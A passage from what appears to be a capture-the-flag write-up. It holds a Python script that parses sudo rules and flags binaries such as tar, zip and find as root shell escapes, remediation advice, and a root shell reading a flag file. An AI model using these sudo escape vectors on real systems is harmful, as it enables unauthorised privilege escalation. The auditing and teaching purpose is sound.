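# (/sbin/reboot, not on the box) so the audit has a non-finding to compare with.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
    (root) /sbin/reboot
"""

# "(runas[:group]) [TAG: ...] /path/to/command [args]"
RULE_RE = re.compile(
    r"^\s*\(([^)]+)\)\s+((?:(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*)*)(\S+)(.*)$"
)

# Hypothetical policy list for this example: binaries that can run arbitrary
# commands when invoked under sudo (tar's checkpoint actions, zip's -T/-TT as
# used above, editors and pagers, find -exec, interpreters).
SHELL_ESCAPE_BINARIES = {"tar", "zip", "vi", "vim", "less", "more", "find",
                         "awk", "python", "python3", "perl"}


def parse_sudo_rules(text):
    """Return the command rules from `sudo -l` output as dicts."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, command, args = m.groups()
        rules.append({
            "runas": runas.split(":")[0].strip(),   # "(root : root)" -> "root"
            "nopasswd": "NOPASSWD" in tags,
            "command": command,
            "args": args.strip(),
        })
    return rules


def risky_rules(rules):
    """Rules granting root (or ALL) on a binary known to allow a shell escape."""
    return [r for r in rules
            if r["runas"] in ("root", "ALL")
            and os.path.basename(r["command"]) in SHELL_ESCAPE_BINARIES]


if __name__ == "__main__":
    rules = parse_sudo_rules(SUDO_L_OUTPUT)
    for r in risky_rules(rules):
        tag = "NOPASSWD" if r["nopasswd"] else "password required"
        print(f"FINDING: {r['command']} as {r['runas']} ({tag}) allows a root shell")
```

Whether or not NOPASSWD is set, the remediation is the same: remove the rule, or replace it with a wrapper script that takes no user-controlled arguments. Requiring a password only changes who can use the escape, not that it exists.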


get flag

# cd /root
# ls
flag.txt
# cat flag.txt
#
#
#
# ROOOOT!
# You did it! Congratz!
#
# Hope you enjoyed!
#
#
#
#

#
